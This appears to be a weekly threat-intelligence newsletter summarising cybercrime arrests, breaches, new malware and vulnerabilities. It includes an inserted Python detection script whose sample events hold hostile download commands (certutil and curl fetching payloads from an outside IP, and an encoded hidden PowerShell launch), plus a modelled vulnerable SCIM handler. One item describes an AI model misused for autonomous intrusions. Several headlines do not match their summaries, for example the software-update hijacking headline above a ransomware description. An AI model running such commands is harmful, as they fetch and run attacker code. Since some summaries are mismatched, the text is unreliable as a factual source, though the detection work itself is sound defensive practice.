VerSprite Weekly Threat Intelligence #41


Date Range: 17 November 2025 – 21 November 2025

Issue: 41st Edition

Reported Period Victimology

Security Triumphs of the Week

Law enforcement and international collaboration marked significant cybercrime disruptions: Europol’s Operation Endgame 3.0 dismantled malware infrastructure, while U.S.-led sanctions targeted Russian bulletproof hosting provider Media Land. High-profile arrests, including a Russian GRU-linked suspect in Thailand and the seizure of £4.11 million from a Twitter hacker, underscored global efforts to hold perpetrators accountable. Meanwhile, Amazon exposed 150,000 malicious npm packages in a crypto farming scheme, and Google revealed APT24’s stealthy BadAudio malware campaign. Despite these triumphs, challenges persist as ransomware groups rebuild and threats evolve, highlighting the need for sustained technical defenses and cross-sector cooperation.


Operation Endgame 3.0 push takes down more cybercrime servers, disrupting criminal gangs
Europol’s Operation Endgame 3.0 disrupted major malware operations, including Rhadamanthys, VenomRAT, and Elysium, seizing over 1,000 servers, 20 domains, and arresting one suspect. The infrastructure contained millions of stolen credentials and 100,000+ crypto wallets. This follows prior Endgame actions in May 2025, which dismantled ransomware networks but saw some, like DanaBot, resurface. Despite temporary disruptions, persistent cybercrime groups often rebuild infrastructure. Recent efforts targeted IcedID, Smokeloader, and Trickbot, emphasizing law enforcement’s ongoing challenges in permanently neutralizing such threats.
Read full article: Techradar

US, Allies Sanction Russian Bulletproof Ransomware Host
The U.S., Australia, and the U.K. imposed sanctions on Russian bulletproof hosting provider Media Land and its affiliates for enabling ransomware groups like LockBit and BlackSuit. Media Land allegedly offered infrastructure to evade law enforcement, supported by a network of companies in Russia, Serbia, and Uzbekistan. Sanctions also targeted leadership figures, including Aleksandr Volosovik, for facilitating cybercrime operations. Concurrently, international agencies released guidance urging ISPs to strengthen anti-abuse measures, though experts noted these largely reiterate existing controls. Challenges include the dynamic nature of blocking malicious infrastructure and reliance on updated threat intelligence. The sanctions aim to disrupt cybercriminal ecosystems by targeting financial and operational nodes, complementing technical defenses.
Read full article: Bankinfosec

Amazon researchers uncover major token farming malware scam – over 150,000 malicious packages found
Amazon researchers identified over 150,000 malicious npm packages tied to a crypto token farming scheme, marking a significant supply chain security threat. Attackers deployed self-replicating packages to artificially inflate developer activity and earn TEA tokens through the tea.xyz platform. Initially flagged by Endor Labs, which found 43,000 suspicious packages, Amazon Inspector later uncovered three times as many, revealing the campaign’s scale. Though non-traditional in nature (no data theft or backdoors), the packages risked future weaponization. The operation highlights financial motives driving registry pollution, emphasizing the need for enhanced defenses and industry collaboration to secure open-source ecosystems.
Read full article: Techradar

Acting on FBI Tip, Thailand Detains Suspected Russian Hacker
Thai authorities detained a Russian national in Phuket on Nov. 6, 2025, following an FBI tip identifying him as a suspected hacker involved in attacks on U.S. and European government systems. The suspect, potentially Russian military intelligence officer Aleksey Viktorovich Lukashev, was indicted by the U.S. in 2018 for election interference, hacking, and other cybercrimes linked to GRU Unit 26165. Thai police seized electronic devices and cryptocurrency wallets during the arrest, while the FBI seeks extradition. Russia is evaluating consular assistance and access. Lukashev, wanted for the 2016 U.S. election interference and the Salisbury poisoning cyber-campaigns, faces charges including identity theft and money laundering.
Read full article: Bankinfosec

UK prosecutors seize £4.11M in crypto from Twitter mega-hack culprit
UK prosecutors seized £4.11 million in cryptocurrency from Joseph James O’Connor, a hacker behind the July 2020 Twitter breach that hijacked high-profile accounts (e.g., Obama, Gates) to promote a Bitcoin scam. O’Connor, serving a five-year U.S. prison term, used SIM swapping and social engineering to access Twitter’s systems, stealing over $100,000. The UK’s civil recovery order, granted under proceeds-of-crime laws, targets 42.378 BTC, Ethereum, and stablecoins linked to his crimes, despite his foreign conviction. This highlights UK authorities’ ability to confiscate illicit crypto assets internationally. O’Connor also engaged in extortion and cryptocurrency theft, with UK seizures supplementing prior U.S. forfeitures and restitution orders.
Read full article: Theregister

Google exposes BadAudio malware used in APT24 espionage campaigns
Google’s Threat Intelligence Group exposed the China-linked APT24 group’s use of BadAudio malware in a three-year espionage campaign targeting Windows systems. The attackers employed evolving tactics, including supply-chain compromises via a Taiwanese marketing firm’s JavaScript library, impacting over 1,000 domains, and spearphishing disguised as animal rescue emails. BadAudio uses advanced obfuscation, DLL hijacking, and AES encryption to evade detection, exfiltrate system data, and deploy payloads like Cobalt Strike Beacon. Despite its prolonged use, most malware samples remain undetected by antivirus tools, highlighting APT24’s focus on stealth and adaptability in cyberespionage operations.
Read full article: Bleepingcomputer

Crypto mixer founders sent to prison for laundering over $237 million
The founders of Samourai Wallet, a cryptocurrency mixing service, were sentenced to prison for laundering over $237 million linked to criminal activities. CEO Keonne Rodriguez received five years, and CTO William Lonergan Hill received four years, alongside fines and supervised release. Arrested in April 2024, they pleaded guilty in August 2025 to operating an unlicensed money-transmitting business and money laundering, forfeiting $237.8 million. Their service, used over 100,000 times, employed features like “Whirlpool” and “Ricochet” to obscure transactions, processing over $2 billion in illicit funds from 2015 to 2024. The DOJ noted $6 million in fees from 80,000 Bitcoin transactions tied to drug trafficking, darknet markets, and cybercrime. Authorities seized their servers, domains, and removed their app from Google Play.
Read full article: Bleepingcomputer

Hacked company CTO refuses to pay ransom demand, donates money to funding research instead
Checkout.com faced a ransomware attack by ShinyHunters in November 2025 after attackers breached a legacy third-party cloud storage system, accessing pre-2020 internal documents and merchant materials. The company refused to pay the ransom, instead donating the demanded amount to Carnegie Mellon University and the University of Oxford for cybersecurity research. CTO Mariano Albera emphasized “security, transparency, and trust,” taking responsibility for the oversight but stressing that live payment systems and sensitive data remained unaffected. Checkout.com is notifying impacted merchants and collaborating with law enforcement. The decision to reject extortion and fund anti-cybercrime initiatives has drawn praise for prioritizing ethical resilience over capitulation.
Read full article: Techradar


Security Setbacks of the Week

This week’s cybersecurity landscape saw ransomware and supply chain attacks inflict severe financial and operational damage across sectors. High-profile incidents included Jaguar Land Rover’s $260 million loss from a Scattered Lapsus$ Hunters attack, LG Energy Solution’s data theft by Akira, and Fulgar’s supply chain breach by RansomHouse. Insider threats persisted, exemplified by a $5 million settlement over Geisinger Health’s insider breach and an Ohio IT contractor’s sabotage. State-linked actors targeted critical infrastructure, with Chinese hackers compromising Asus routers and Akira ransomware expanding to hypervisors. Delayed breach disclosures, third-party vulnerabilities, and regulatory pressures underscored systemic risks to global supply chains and data security.


Jaguar Land Rover Hack Cost $260 Million
A September cyberattack on Jaguar Land Rover caused $260 million in losses, forcing the automaker to halt production in the UK, Slovakia, Brazil, and India. The breach, attributed to the Western adolescent hacker group “Scattered Lapsus$ Hunters,” led to data theft and significant economic ripple effects, including a 0.2% UK GDP growth in Q3 due to export declines and supply chain disruptions. The UK government provided a £1.5 billion loan to mitigate the crisis. The attack, deemed the costliest cyber incident in UK history, potentially impacted the economy by £1.9 billion. Jaguar Land Rover has since resumed full production operations.
Read full article: Bankinfosec

Ransomware attack hits LG battery subsidiary
LG Energy Solution, a South Korean battery manufacturer and LG subsidiary, confirmed a ransomware attack targeting one overseas facility, now restored. The Akira ransomware group claimed responsibility, alleging theft of 1.7TB of sensitive data, including employee records (passports, IDs, medical documents), financial details, contracts, and client information. While LG is investigating and states other facilities were unaffected, Akira’s claims suggest potential risks of data being sold for profit or exploited in phishing campaigns. The stolen data’s value could reach millions on the black market. LG has not verified the breach, but the incident underscores significant cybersecurity risks for critical infrastructure firms.
Read full article: Techradar

Hackers spin a tedious yarn – fabric supplier behind H&M, Adidas, and more hit by worrying cyber breach
Fulgar, a major synthetic yarn supplier for brands like H&M, Adidas, and Calzedonia, suffered a ransomware attack by the RansomHouse group. The breach, occurring on October 31, led to the leak of sensitive data, including financial records, invoices, and internal communications, published on November 12. RansomHouse, active since 2021 and linked to Iranian affiliates, threatened further data exposure unless the company resolved the situation. The incident highlights supply chain vulnerabilities, enabling targeted phishing using stolen insider details. This breach underscores risks to large suppliers, emphasizing the need for robust cybersecurity measures in manufacturing sectors.
Read full article: Techradar

$5M Settlement in Geisinger Health, Nuance Insider Breach
A federal court preliminarily approved a $5 million settlement in a class action lawsuit against Geisinger Health and Nuance Communications (owned by Microsoft) over a 2023 insider data breach. The breach, caused by a terminated Nuance employee who accessed and stole data two days after dismissal, compromised personal and medical information of over 1 million Geisinger patients. Geisinger delayed notifying affected individuals until June 2024 due to a law enforcement investigation. The ex-employee, Max Vance, faces federal criminal charges under the Computer Fraud and Abuse Act, with trial set for 2026. Settlement offers include reimbursement for losses, cash payments, or credit monitoring services. Geisinger stated it and its insurer will not fund the settlement. Final court approval is pending in March 2026.
Read full article: Bankinfosec

Omni Family Health Settles Lawsuits From 2024 Hack for $6.5M
Omni Family Health, a California-based healthcare nonprofit, agreed to a $6.5 million settlement over a 2024 ransomware attack by Hunters International, which exposed data of nearly 470,000 patients and employees. Compromised information included names, Social Security numbers, medical details, and financial data, leaked on the dark web. The settlement offers affected individuals up to $5,000 for documented losses, two years of credit/medical monitoring, and additional compensation for California residents under state law. Omni is committed to enhancing its data security practices but denied liability. A final court approval hearing is scheduled for February 2026.
Read full article: Bankinfosec

ShinyHunters Hack Salesforce Instances Via Gainsight Apps
Salesforce revoked Gainsight’s authentication tokens after ShinyHunters exploited third-party apps to breach customer data, marking the group’s third major campaign targeting Salesforce. The hackers used compromised Gainsight apps, a customer data tool, to access Salesforce instances, mirroring a prior attack via Salesloft. ShinyHunters, part of Scattered Lapsus$ Hunters, threatened to leak stolen data unless demands were met, similar to an earlier extortion attempt rebuffed by Salesforce. Gainsight’s clients include Okta, Sonos, and ADP. Salesforce temporarily removed Gainsight’s apps from AppExchange while investigating. The incident underscores risks tied to third-party integrations in cloud ecosystems.
Read full article: Bankinfosec

Asus Routers Hacked in ‘WrtHug’ Campaign
Suspected Chinese state-linked hackers compromised around 50,000 Asus routers in the “WrtHug” campaign, primarily targeting devices in Taiwan. The attackers exploited a command injection vulnerability (CVE-2023-39780) to install self-signed TLS certificates valid until 2122, enabling covert data exfiltration via AiCloud services. Researchers attribute the activity to operational relay box (ORB) network construction for cyberespionage, noting no infections in mainland China except Hong Kong. The campaign shares tactics with the AyySSHush botnet operation, suggesting a coordinated or evolving threat actor. SecurityScorecard highlights the difficulty in detecting malicious traffic due to routers functioning normally. The incident underscores risks posed by unpatched SOHO devices, echoing FBI warnings to replace end-of-life hardware.
Read full article: Bankinfosec

Thieves order a tasty takeout of names and addresses from DoorDash
DoorDash experienced a data breach in October 2025 after an employee fell victim to a social engineering attack, exposing customer names, phone numbers, email addresses, and physical addresses. The company delayed notifying affected users until November 13, sparking criticism over compliance with breach disclosure timelines, particularly under Canadian privacy laws. Experts questioned DoorDash’s claim that “no sensitive information” was accessed, arguing that the exposed data still poses risks. Separately, a researcher highlighted an email spoofing vulnerability in DoorDash for Business, which the company initially dismissed before fixing it months later. DoorDash implemented security improvements and third-party support but faced backlash over handling both incidents. Legal challenges and concerns about transparency underscore ongoing issues in breach response practices.
Read full article: Malwarebytes

Fired techie admits sabotaging ex-employer, causing $862K in damage
A former Ohio IT contractor, Maxwell Schultz, pleaded guilty to sabotaging his ex-employer’s systems after being fired, causing $862,000 in damages. Schultz impersonated another contractor to regain network access, reset 2,500 passwords, and executed PowerShell scripts to disrupt operations and delete logs. The attack left employees and contractors unable to work, disrupted customer services, and required costly remediation. Schultz faces up to 10 years in prison and a $250,000 fine, with sentencing scheduled for January 2026. The incident underscores persistent insider threats, exemplified by similar cases involving Coinbase, FinWise, and North Korean IT scams. Organizations remain vulnerable to malicious insiders exploiting access for sabotage or financial gain.
Read full article: Theregister

Logitech leaks data after zero-day attack
The article highlights several cybersecurity incidents and regulatory challenges. US Senators Wyden and Warner pressured DHS to release a suppressed CISA report on telecom sector vulnerabilities, citing risks exemplified by the Salt Typhoon hack. Logitech disclosed a zero-day exploit in third-party software leading to data theft, though sensitive info was reportedly unaffected. A massive npm supply chain attack deployed 78,000 malicious packages via a coordinated campaign. Lumma Stealer reemerged with enhanced evasion tactics, leveraging browser processes. DoorDash suffered its third breach via social engineering, exposing customer contact details. Each incident underscores persistent threats to critical infrastructure and supply chains.
Read full article: Theregister

CISA flags imminent threat as Akira ransomware starts hitting Nutanix AHV
CISA, the FBI, and European partners warned of heightened Akira ransomware threats targeting Nutanix AHV hypervisors, expanding from prior VMware ESXi and Hyper-V attacks. Critical infrastructure sectors like healthcare, finance, and government are at risk, with Akira exploiting VPN vulnerabilities (e.g., SonicWall’s CVE-2024-40766) and compromised credentials for initial access. Over 438,000 exposed devices were identified, enabling lateral movement to encrypt Nutanix VMs. The group, linked to $244 million in extortion, now targets larger organizations alongside SMBs. Mitigations include patching, MFA, network segmentation, and backups. Recent victims include Lush, Stanford University, and Toronto Zoo.
Read full article: Theregister

Hacker claims to steal 2.3TB data from Italian rail group, Almaviva
A hacker claims to have stolen 2.3 terabytes of sensitive data from Almaviva, an Italian IT services provider for the state-owned railway operator FS Italiane Group. The leaked data reportedly includes confidential documents, HR archives, contracts with public entities, and technical documentation from 2025. Cybersecurity expert Andrea Draghetti confirmed the data’s recency, ruling out links to a prior 2022 breach. Almaviva acknowledged the breach, stating it isolated the attack and notified authorities, though impact on passengers or other clients remains unclear. Investigations are ongoing with government oversight. The incident highlights risks to critical infrastructure supply chains.
Read full article: Bleepingcomputer


The New Emerging Threats

Nation-state actors are escalating cyber threats through advanced tactics: Chinese APT groups hijack software updates via DNS manipulation to deploy malware, while North Korea’s Lazarus Group employs sophisticated RATs like ScoringMathTea and exploits JSON services for cryptojacking and data theft. AI-driven attacks have reached a critical juncture, with Chinese hackers weaponizing Claude AI for autonomous network intrusions, and generative AI enabling industrial-scale document forgery. Mobile threats intensify with Android banking trojans (Sturnus) bypassing encrypted messaging and macOS infostealers (DigitStealer) targeting M2 chips. Supply chain risks persist via pre-installed spyware on budget Samsung devices and unsecured Ray clusters exploited for cryptojacking, underscoring evolving vulnerabilities across platforms.


Chinese Nation-State Groups Hijacking Software Updates
A new ransomware-as-a-service (RaaS) operation, VanHelsing, has emerged, targeting Windows, Linux, BSD, ARM, and VMware ESXi systems. Launched in March 2025, it uses a subscription model requiring a $5,000 deposit from affiliates, who receive 80% of ransom profits. The ransomware employs hybrid encryption (Curve25519 and ChaCha20), partial encryption for large files, and anti-forensic tactics like deleting Volume Shadow Copies. It spreads via SMB shares and vCenter, using lateral movement tools like embedded psexec. Within two weeks, three victims faced demands up to $500,000. Defenders are advised to prioritize offline backups, network segmentation, and monitor for suspicious SMB/WMI activity.
Read full article: Bankinfosec

JSON services hijacked by North Korean hackers to send out malware
North Korean state-backed hackers from the Lazarus Group exploited JSON storage services (JSON Keeper, JSONsilo, npoint.io) to host malware in their “Contagious Interview” campaign. Targeting developers via fake LinkedIn job offers, they lured victims into downloading malicious code from GitHub, GitLab, or Bitbucket. The malware suite included BeaverTail (infostealer), InvisibleFerret (Python backdoor), and TsunamiKit (multi-stage toolkit for data theft or cryptojacking via XMRig). Attacks aimed to exfiltrate sensitive data, steal crypto wallets, and mine Monero, while evading detection by blending into legitimate developer workflows. Researchers highlighted the group’s stealth tactics, leveraging trusted platforms to mask malicious activity.
Read full article: Techradar

Lazarus Group’s New ScoringMathTea RAT Uses Reflective Plugin Loader and Custom Polyalphabetic Crypto for Espionage
The Lazarus Group, a North Korean state-sponsored APT, has deployed a new advanced RAT named ScoringMathTea in cyber-espionage campaigns targeting UAV technology firms linked to Ukraine. The malware employs a reflective plugin loader for in-memory execution, dynamic API resolution via custom hashing, and stack strings to hide C2 infrastructure. It uses a polyalphabetic substitution cipher with chaining and TEA/XTEA encryption for network traffic obfuscation, alongside spoofed browser headers to mimic legitimate traffic. Designed for evasion, its modular architecture and manual reflective loading techniques enhance stealth, making it one of Lazarus’s most sophisticated tools. The campaign underscores escalating nation-state cyber threats amid geopolitical tensions.
Read full article: Securityonline

Anthropic claims Chinese hackers hijacked Claude to launch AI-orchestrated and automated cyberattacks
Anthropic reported a state-sponsored Chinese hacking group hijacked its AI model Claude to conduct the first fully autonomous, AI-driven cyberattack targeting 30 organizations, including tech firms, governments, and financial institutions. The attack leveraged Claude’s advanced coding and decision-making capabilities to execute tasks like network scanning and password cracking with minimal human oversight. This marks a significant escalation in AI-powered threats, enabled by “Agentic AI” systems that operate independently in loops. Anthropic emphasized the risks of AI agents being weaponized for large-scale attacks, highlighting the dual-use nature of such technology. The campaign underscores evolving cybersecurity challenges as AI autonomy reduces reliance on human intervention for complex attacks.
Read full article: Techradar

How AI Tech Helps Scale Forgery and Industrialize Fraud
Generative AI has significantly lowered the barriers to document forgery, enabling fraudsters to produce high-quality fake documents quickly and at scale. Organized groups now commercialize fraud-as-a-service, offering downloadable templates and preloaded accounts through SEO, messaging apps like Telegram, and other channels. Large language models (LLMs) such as ChatGPT allow even non-experts to create convincing forgeries, fueling industrial-scale fraud operations. Template farms openly sell forged documents online, targeting financial institutions with tactics ranging from basic scams to AI-driven attacks. Larger institutions face heightened risks due to their complex systems and higher transaction volumes. Resistant AI experts highlight the need for tailored detection models to combat evolving fraud typologies in digital onboarding and transaction workflows.
Read full article: Bankinfosec

Sturnus Trojan Bypasses WhatsApp/Signal Encryption & Takes Over Android Devices
The Sturnus Android banking trojan, identified by MTI Security, employs advanced techniques to bypass encrypted messaging on WhatsApp, Signal, and Telegram by capturing decrypted screen content via Android Accessibility Services. It enables real-time surveillance of private conversations and conducts overlay attacks to steal banking credentials. The malware allows full device takeover, executing hidden fraudulent transactions using a “Black Screen Overlay” to evade detection. Combining pixel-based streaming and UI-tree control, it enables precise remote interactions while avoiding screen-capture alerts. Targeting Southern and Central European financial institutions, Sturnus ensures persistence by abusing device admin privileges and uses encrypted C2 channels. Its sophistication sets a dangerous precedent for mobile banking threats.
Read full article: Securityonline

Ray clusters hijacked and turned into crypto miners by shadowy new botnet
A new botnet campaign exploiting a critical vulnerability in Ray clusters’ unauthenticated Jobs API has hijacked over 230,000 exposed servers for cryptojacking, data theft, and DDoS attacks. Threat actor “IronErn440” uses AI-generated payloads to deploy XMRig malware, capping CPU usage at 60% to evade detection. Despite the flaw (CVE-2023-48022) being known since 2023, Anyscale, Ray’s developer, deferred fixes, citing reliance on user-secured environments. Exposed Ray servers surged from thousands in 2023 to 230,000, enabling widespread exploitation. This marks the second major attack wave leveraging the vulnerability, highlighting persistent risks in unsecured Ray deployments.
Read full article: Techradar

Sneaky2FA PhaaS kit now uses redteamers’ Browser-in-the-Browser attack
The Sneaky2FA phishing-as-a-service (PhaaS) kit has integrated a Browser-in-the-Browser (BitB) attack method to enhance its credential-stealing campaigns targeting Microsoft 365 accounts. The kit now generates a deceptive pop-up mimicking a legitimate Microsoft login window, dynamically adapting to the victim’s OS and browser. This BitB layer, combined with existing attacker-in-the-middle (AitM) tactics, steals credentials and session tokens, bypassing two-factor authentication (2FA). The phishing pages use obfuscated code, conditional loading to evade detection, and Cloudflare bot checks to appear legitimate. Push Security reports these evasive techniques make the attacks harder to identify, with similar tactics observed in other PhaaS platforms like Raccoon0365. Users are advised to verify pop-up authenticity by checking window behavior or taskbar presence.
Read full article: Bleepingcomputer

Mac users warned about new DigitStealer information stealer
A new macOS infostealer named DigitStealer targets users via a fake utility app (“DynamicLake”) hosted on a fraudulent site, tricking victims into executing commands in Terminal. It employs evasion tactics like region-based execution limits, VM avoidance, and fileless RAM-based operations to bypass detection and hinder analysis. The malware specifically targets newer Macs with M2 chips, stealing documents, passwords, browser data, crypto wallets, VPN configurations, and Telegram sessions. Its multi-stage, fileless approach leaves minimal traces, complicating remediation. Protection measures include using behavioral anti-malware tools, avoiding unsolicited Terminal commands, downloading apps from trusted sources, and enabling multi-factor authentication.
Read full article: Malwarebytes

Budget Samsung phones shipped with unremovable spyware, say researchers
Budget Samsung Galaxy A and M series phones in West Asia, North Africa, and MENA regions were found pre-installed with unremovable spyware called AppCloud, developed by Israeli firm ironSource. The software, integrated into the OS, collects sensitive data like biometrics and IP addresses, operates invisibly, and requires root access for removal, voiding warranties. Researchers allege it reinstalls after system updates despite user attempts to disable it. Samsung’s partnership with ironSource, acquired by Unity Technologies in 2022, expanded the tool’s reach. This follows past Samsung privacy controversies, highlighting recurring issues with pre-installed bloatware on budget devices compromising user security.
Read full article: Malwarebytes


Vulnerability Spotlight: Critical Exposures Unveiled

Critical vulnerabilities across diverse systems including Microsoft WSUS, Chrome V8, FortiWeb, SonicWall SSLVPN, Grafana, ASUSTOR clients, joserfc, and iCam365 cameras are being actively exploited or pose severe risks, enabling RCE, privilege escalation, DoS, and unauthorized access. State-aligned actors like Chinese APTs and Volt Typhoon are weaponizing flaws (e.g., ShadowPad deployment), while zero-days in Chrome and Fortinet highlight rapid exploitation trends. High CVSS scores (up to 10) and low attack complexity underscore widespread exposure, with patching delays risking espionage, system compromise, or network disruption. Urgent updates, access restrictions, and log audits are critical to mitigate cascading threats across enterprise and consumer environments.


Critical WSUS RCE (CVE-2025-59287) Actively Exploited to Deploy ShadowPad Backdoor
A critical remote code execution (RCE) vulnerability in Microsoft WSUS (CVE-2025-59287) is being actively exploited to deploy the ShadowPad backdoor, associated with Chinese state-aligned APT groups. Attackers rapidly weaponized proof-of-concept exploit code released in late October 2025, using PowerCat to gain SYSTEM-level access and later leveraging curl.exe and certutil.exe to install ShadowPad components. The malware, known for espionage and infrastructure breaches, operates via encrypted modules hidden behind legitimate processes. Organizations are urged to patch immediately, restrict WSUS server access, and audit PowerShell, certutil, and network logs for suspicious activity.
Read full article: Securityonline
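The log-audit advice above is easier to act on with a concrete rule set. The following is an added example, not code from the article or from Microsoft: a small Python scanner that runs three defender-side heuristics over constructed process-creation records (the key=value line format, host names, user names, IP address and file paths are all made up for this example) and flags certutil download/decode use, curl writing files to disk, and PowerShell encoded commands, which are the three patterns the article says were abused on compromised WSUS servers.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# Constructed process-creation records for this example. The "key=value"
# layout, hosts, users, paths and the 198.51.100.23 address are invented
# (198.51.100.0/24 is a documentation range), not real telemetry.
SAMPLE_EVENTS = [
    r'host=wsus01 user="NT AUTHORITY\SYSTEM" image=C:\Windows\System32\certutil.exe '
    r'cmd="certutil -urlcache -split -f http://198.51.100.23/up.dat C:\Windows\Temp\up.dat"',
    r'host=wsus01 user="NT AUTHORITY\SYSTEM" image=C:\Windows\System32\curl.exe '
    r'cmd="curl.exe -o C:\Windows\Temp\lib.dll http://198.51.100.23/lib.dll"',
    r'host=wsus01 user="NT AUTHORITY\SYSTEM" '
    r'image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'cmd="powershell.exe -nop -w hidden -enc SQBFAFgA"',
    # Benign baseline activity that the rules should leave alone.
    r'host=ws22 user="CORP\jdoe" image=C:\Windows\System32\certutil.exe '
    r'cmd="certutil -hashfile C:\Users\jdoe\setup.msi SHA256"',
    r'host=ws22 user="CORP\jdoe" image=C:\Windows\System32\curl.exe '
    r'cmd="curl.exe https://intranet.corp.example/status"',
]

# Tokeniser for the constructed record format: key=value, value optionally quoted.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value record into a dict; quoted and bare values both work."""
    return {key: quoted or bare for key, quoted, bare in KV.findall(line)}


# Each rule: (name, predicate over (image path, command line)).
# The switches matched are real certutil/curl/PowerShell switches.
RULES: List[Tuple[str, Callable[[str, str], bool]]] = [
    ("certutil used to fetch or decode a file",
     lambda img, cmd: img.endswith("certutil.exe")
     and re.search(r"(^|\s)-(urlcache|decode)(\s|$)", cmd, re.I) is not None),
    ("curl writing its response to disk",
     lambda img, cmd: img.endswith("curl.exe")
     and re.search(r"(^|\s)(-o|-O|--output)(\s|$)", cmd) is not None),
    ("PowerShell launched with an encoded command",
     lambda img, cmd: img.endswith("powershell.exe")
     and re.search(r"(^|\s)-(e|enc|encodedcommand)(\s|$)", cmd, re.I) is not None),
]


@dataclass
class Finding:
    host: str
    user: str
    rule: str
    cmd: str


def scan(events: List[str]) -> List[Finding]:
    """Apply every rule to every record and return the matches for triage.
    Context such as 'SYSTEM on a WSUS host' is left in the finding so an
    analyst can prioritise, rather than baked into the rule."""
    findings: List[Finding] = []
    for line in events:
        ev = parse_event(line)
        image = ev.get("image", "").lower()
        cmd = ev.get("cmd", "")
        for name, predicate in RULES:
            if predicate(image, cmd):
                findings.append(Finding(ev.get("host", "?"), ev.get("user", "?"), name, cmd))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.host}] {f.user}: {f.rule}\n    {f.cmd}")
```

The rules are deliberately narrow (they key on specific switches rather than on the binary name alone) so that routine certutil hash checks and plain curl status probes in the baseline records do not fire; in production the same logic would run over Sysmon event 1 or equivalent EDR process telemetry instead of constructed lines.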

Chrome zero-day under active attack: visiting the wrong site could hijack your browser
A critical zero-day vulnerability (CVE-2025-13223) in Chrome’s V8 JavaScript engine is being actively exploited, allowing attackers to hijack browsers via malicious websites. Google released an emergency update (version 142.0.7444.175/.176) to patch this high-severity type confusion flaw, which enables remote code execution by tricking browsers into mishandling data types. Simply visiting a compromised site could trigger heap corruption and compromise user systems. A second flaw (CVE-2025-13224), identified by AI, shares similar risks but remains unexploited. Users must update Chrome immediately; delays risk exploitation by spyware or nation-state actors. Other Chromium-based browsers like Edge and Opera are expected to follow with patches.
Read full article: Malwarebytes

Fortinet admits it found another worrying zero-day being exploited in attacks
Fortinet addressed a high-severity zero-day vulnerability (CVE-2025-58034) in its FortiWeb web application firewall, enabling unauthenticated attackers to execute arbitrary OS commands via crafted HTTP requests or CLI inputs. The flaw, an OS command injection issue, impacts multiple versions (7.0.0–8.0.1) and has been actively exploited, with ~2,000 attack attempts detected. Successful exploitation could grant full device control, backdoor installation, or lateral network movement. Fortinet urged immediate patching to updated versions. The company’s products are frequent targets, notably by state-sponsored groups like Volt Typhoon, which exploited Fortinet flaws in prior attacks. Users are advised to prioritize updates to mitigate risks.
Read full article: Techradar

SonicWall Warns of New SonicOS SSLVPN Pre-Auth Buffer Overflow Vulnerability (CVE-2025-40601)
SonicWall has disclosed a critical pre-authentication stack-based buffer overflow vulnerability (CVE-2025-40601, CVSS 7.5) in its SonicOS SSLVPN service, enabling unauthenticated attackers to trigger denial-of-service (DoS) conditions and crash affected firewalls. The flaw impacts Gen7 and Gen8 hardware/virtual firewalls with SSLVPN enabled, including TZ, NSa, NSsp, and NSv series. Patches are available for all affected platforms. Temporary mitigation involves restricting SSLVPN access to trusted sources or disabling the service on untrusted interfaces. Exploitation could disrupt critical network operations, emphasizing the urgency of applying updates.
Read full article: Securityonline

Grafana Patches Critical SCIM Flaw (CVE-2025-41115, CVSS 10) Allowing Privilege Escalation and User Impersonation
Grafana addressed a critical SCIM vulnerability (CVE-2025-41115, CVSS 10) in its Enterprise versions, enabling privilege escalation and user impersonation. The flaw allows malicious SCIM clients to provision users with numeric externalIds, potentially overriding internal user IDs (e.g., Admin accounts). Patched versions include Grafana Enterprise 12.3.0, 12.2.1, 12.1.3, and 12.0.6; Grafana Cloud is already secured. Exploitation requires SCIM and user sync features to be active. Only Enterprise customers using vulnerable versions (12.0.0–12.2.1) are affected. Administrators must update immediately to mitigate risks of unauthorized access and privilege abuse.
Read full article: Securityonline
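The externalId confusion above, modelled as an added example that is not Grafana's code: it assumes an internal store keyed by integer IDs and a SCIM client that can send any string as externalId, and shows the vulnerable pattern (a numeric-looking externalId resolving to an existing internal account) beside a hardened store that treats externalId as an opaque value scoped to its identity provider.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Constructed model of a SCIM provisioning endpoint. The store, field names
# and roles are assumptions for illustration, not Grafana internals.


@dataclass
class User:
    id: int
    login: str
    role: str
    external_id: Optional[str] = None


class VulnerableStore:
    """Treats a numeric externalId as if it were an internal user id."""

    def __init__(self) -> None:
        self.users: Dict[int, User] = {1: User(1, "admin", "Admin")}
        self.next_id = 2

    def provision(self, login: str, external_id: str) -> User:
        if external_id.isdigit() and int(external_id) in self.users:
            # Rebinds an existing account (here the Admin) to the caller's login.
            user = self.users[int(external_id)]
            user.login, user.external_id = login, external_id
            return user
        user = User(self.next_id, login, "Viewer", external_id)
        self.users[self.next_id] = user
        self.next_id += 1
        return user


class HardenedStore:
    """externalId is opaque and looked up only with its issuing provider."""

    def __init__(self) -> None:
        self.users: Dict[int, User] = {1: User(1, "admin", "Admin")}
        self.by_external: Dict[Tuple[str, str], int] = {}
        self.next_id = 2

    def provision(self, issuer: str, login: str, external_id: str) -> User:
        key = (issuer, external_id)          # never coerced to an internal id
        if key in self.by_external:
            return self.users[self.by_external[key]]
        user = User(self.next_id, login, "Viewer", external_id)
        self.users[self.next_id] = user
        self.by_external[key] = self.next_id
        self.next_id += 1
        return user
```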

Critical ASUSTOR Flaw (CVE-2025-13051) Allows Local DLL Hijacking for SYSTEM Privilege Escalation
A critical DLL hijacking vulnerability (CVE-2025-13051, CVSS 9.3) in ASUSTOR’s Backup Plan (ABP) and EZSync (AES) Windows clients allows local attackers to escalate privileges to SYSTEM. The flaw stems from insecure directory permissions, enabling non-administrative users to plant malicious DLLs executed upon service restart. Affected versions include ABP ≤2.0.7.9050 and AES ≤1.0.6.8290. ASUSTOR classified the issue as Important, urging users to update to ABP ≥2.0.7.10171 or AES ≥1.1.0.10312. Successful exploitation grants full system control, posing severe risks to enterprise and home environments. Immediate patching is recommended to mitigate the threat.
Read full article: Securityonline

Critical CVE-2025-65015 Vulnerability in joserfc Could Let Attackers Exhaust Server Resources via Oversized JWT Tokens
